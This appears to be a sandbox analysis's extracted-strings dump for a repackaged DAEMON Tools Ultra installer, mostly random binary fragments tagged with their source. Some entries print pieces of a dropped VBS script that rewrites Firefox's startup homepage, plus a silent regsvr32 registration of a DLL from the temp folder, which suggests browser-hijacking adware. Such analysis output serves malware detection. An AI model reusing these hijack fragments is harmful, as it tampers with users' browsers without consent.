-dU&!Ypg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-egUv{mbt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-fFe1FIg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-l2e<,RJK9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-Microsoft Visual C++ Runtime Library

Unicode based on Memory/File Scan (dtinst.exe , 00040537-00003780.00000000.41037.002D7000.00000002.mdmp)

-n]\hn)3nv}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-RW=fak&W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-r~^A-

Ansi based on Dropped File (imgengine.dll.62529018)

-service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

-SVdZOHKP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-T Zr%jlf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-t]Jm<8cf-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-uninstalldriver

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

-vGt)bhhZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-X]#m3V1M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-{GAOsfS@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

. %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

."=#SuNw%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.#vc^MSMm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.%u%s%s

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

... %d%%

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

....00033668::;;;;;<79

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

.1Z.F/+t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.5)[W@X20r:@ygrEVl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.5-/<xXS,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.9^hc^gg

Ansi based on Dropped File (Uninstall.exe.212096218)

.>%]!>,9M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.?H-s4{[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.\boost/exception/detail/exception_ptr.hpp

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

.\d6t@

Ansi based on Dropped File (Uninstall.exe.212096218)

.\mmommoomopmopnmppnp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.]MtF".PJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.a2 s193(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Close

Ansi based on Dropped File (start72urez3kr.vbs)

.cvR[-}7!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.DEFAULT\Control Panel\International

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.e^3en_R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.eb`ee`eo`f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.flac

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

.Global = False

Ansi based on Dropped File (start72urez3kr.vbs)

.i/\=pS5]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.IgnoreCase = True

Ansi based on Dropped File (start72urez3kr.vbs)

.img0

Ansi based on Dropped File (imgengine.dll.62529018)

.iscsi

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

.jSGCPlQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.kI/63zEXh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.KjV.

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

.kM6=<h6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.lUCSkd|d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.ndata

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.NN-KNLKT\O\_Wb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Pattern = "(user_pref\(""browser\.startup\.homepage"", )(.*)(\);)"

Ansi based on Dropped File (start72urez3kr.vbs)

.PONOKQWOQ^Q`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.pr2SIa_m

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.reloc

Ansi based on Dropped File (imgengine.dll.62529018)

.rsrc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.t$[Zvtm&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Ta{E!jo.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.text

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.UUCK6Lz&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.vmdk

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

.w=8'ZRZN*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Write objRegExp_HomePage.Replace(strContent, "$1""" & strHomePage & """$3")

Ansi based on Dropped File (start72urez3kr.vbs)

.WriteLine "user_pref(""browser.startup.homepage"", """ & strHomePage & """);"

Ansi based on Dropped File (start72urez3kr.vbs)

/"V:~(]60Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/'',-333,,,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/*:ZdnOwlk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/+p8(!,dbV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/////

Ansi based on Dropped File (JSSys3.dll.204366558)

//////

Ansi based on Dropped File (JSSys3.dll.204366558)

//8Xcfk

Ansi based on Dropped File (Uninstall.exe.212096218)

/1601

Unicode based on Dropped File (JSSys3.dll.204366558)

/1:::R::R6TYM\[W\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/:Z`ik`Xg

Ansi based on Dropped File (Uninstall.exe.212096218)

/>s_(bZz;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/>XRw=+:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/\mmpmmponppppppppppp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/`r_rGxS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/cbb``bb`af``ff3hhffhfgmmmqppppppppppp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/FBn9sSG5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/ji`96Mw|~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/reg_scsi

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/reg_scsi %s %s "%s"

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

/reg_scsi dtultrascsibus {874FDCE0-46C5-4C59-8B25-3159C12C6B86} "DAEMON Tools Ultra Virtual SCSI Bus"

Ansi based on Process Commandline (dtinst.exe)

/reg_usb_client

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/reg_usb_server

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/s "%TEMP%\HiRu\JSSys3.dll"

Ansi based on Process Commandline (regsvr32.exe)

/service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/Service

Ansi based on Process Commandline (DiscSoftBusService.exe)

/uninstalldriver

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/unreg_scsi

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/unreg_scsi %s

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/unreg_scsi dtultrascsibus

Ansi based on Process Commandline (dtinst.exe)

/unreg_usb_client

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/unreg_usb_server

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/y$CWHyiY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0#]2wcqfZg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0$f_P$`S5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0*9Y}:cB)$azm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0,+B@ew}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0,___q

Ansi based on Image Processing (screen_4.png)

0.0.0.0

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

0000+.

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

00000

Ansi based on Dropped File (JSSys3.dll.204366558)

000000

Unicode based on Dropped File (JSSys3.dll.204366558)

00000409

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

0123456789abcdef

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

0123456789ABCDEF

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

01u]w

Ansi based on Dropped File (imgengine.dll.62529018)

09BUU_&^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0<22D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0<<<G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0<<tG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0]VpF,k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0___D9___q_'_

Ansi based on Image Processing (screen_4.png)

0B5VWqkrg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0mm_______

Ansi based on Image Processing (screen_7.png)

0n%owy<Kk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0S8;8345,,.+++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0W2:.L=oT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0XXSMS8868333,,,+++++++++.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1 = %MediaDescription%

Ansi based on Dropped File (SET4F37.tmp)

1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

1+3^EIe)9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1.20.0.0

Unicode based on Dropped File (imgengine.dll.62529018)

133121

Unicode based on Runtime Data (dtinst.exe )

1524?

Ansi based on Dropped File (imgengine.dll.62529018)

1555=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

16&Djs6F)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1864B0952}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

1]lS$]|$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1CF.efZwz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1F$35RQ#p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1g2)7Sz}4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1ltW`97T>+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1mPALCfDSZ<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1p]w:k1)@>aA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1tttGx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1v^h%IYQH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1X $+%{gfsE

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1Xsjsg/_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1yJ/rMVnR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1~iY?xZJE<U-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2000-2009 by Joseph K. Priestley

Unicode based on Dropped File (JSSys3.dll.204366558)

2000-2014

Unicode based on Dropped File (imgengine.dll.62529018)

211111111))

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

27_z=72

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2:::7RZ:L9TKT^QW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2:::R::RRN6KMMMPWVWjo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2Fxc<S2F/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2G+r:Avol

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2gI/KI*%e>,/\>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2Gx&M8,s4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2xB/pWbf&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2Yb?_w1Qd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2|qqpeg+V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

2~a``Z`\\___

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3'e}.KgQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3'nynm_nporp'mmyc_M_'c7

Ansi based on Image Processing (screen_7.png)

3.',12

Ansi based on Dropped File (Uninstall.exe.212096218)

3......

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

341lf5SU;`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

354<>

Ansi based on Dropped File (imgengine.dll.62529018)

3958_gae

Ansi based on Dropped File (Uninstall.exe.212096218)

39[QHU?^\`}t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3:M:9ND=c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3;Y4@N jj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3?3L`x,nD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3B179347615B32FE859CEABBE50C3EE6_*

Unicode based on Runtime Data (dtinst.exe )

3flp&gT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3H&u ]:'p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3hoVM)_m[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3lK=*a#d#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3sbyFXlJvm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3uQf~a:h>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3V4\4`4d4h4l4p4t4x4

Ansi based on Dropped File (imgengine.dll.62529018)

3y]0*C:FY[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

3z@QQV3Le\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4(g+8y3:Cg*^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4.TMP

Ansi based on Dropped File (JSSys3.dll.204366558)

41.@'kRQg\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

43VNeoC

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

48^!?heo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

499B1822

Unicode based on Runtime Data (dtinst.exe )

4;@;h;

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

4c6m;^lhnU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4feQr:Zz1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4G]%7O0R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4gEZfa&d]K.Y{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4Hk^2+wW8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4Pd>-iPi-7kfu]-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4T\:L/`zr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

4WePQeQ`^o`o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5 #`-s`RUm<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5#JSX<=LN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5&Ap^I_0-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5*liwadE

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5>VGfH9mH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5?B&PKEI3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5A^f(`za!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5beeQ`^e`o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5CompanyName

Ansi based on Dropped File (JSSys3.dll.204366558)

5DXP[XcG[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5GetIniVal

Ansi based on Dropped File (JSSys3.dll.204366558)

5I{?&vM9<5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5j|#kydR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5MOr38mT>m

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5SZVoZv+<@!u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

5Wgo8uW|a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6-6L6

Ansi based on Dropped File (imgengine.dll.62529018)

62,6

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

6666666

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

6666666666666666626

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

668::;;===!!<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

66?wbYyI!+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6;7B7c7j72?8?

Ansi based on Dropped File (imgengine.dll.62529018)

6dDI{+d'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6g$-z_?BQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6N@Jfs"L(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6Pbb`de``of`oj`h

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6T2qT&*:nOX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

6vForceWW

Ansi based on Dropped File (JSSys3.dll.204366558)

6z?W6&;_4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7"GetActiveWindowTitle

Ansi based on Dropped File (JSSys3.dll.204366558)

7%&':

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7%pe<jkNy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7+P6JhP}|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7+p@K*"bF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7]S:UWq7H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7L.Sm6im

Ansi based on Image Processing (screen_4.png)

7MbK^!M)ua

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7OUvj|LFg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7QTOOWWO\oQe

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

7Rx!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8-~sS.(<dom

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

84I:YP((3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

88666644444

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

88852

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

8?8ye}{)b,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8d'?2kJ6u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8dk*P,CL>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8j:J<Z>

Ansi based on Dropped File (imgengine.dll.62529018)

8jOW/R,.n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8L1b)X#:M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8LW1R:)iU)|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8l~bFdCx<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8N.k3sW,N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8oyi>Nut(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

8~E'r:y$B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9!~?F<gcV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9$487KB~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9%Zpb~97Yj>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9-;>;

Ansi based on Dropped File (imgengine.dll.62529018)

9.P#?hT7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

92g:7K5Up$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

93@ryVM,o.DA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

983Ha46}z

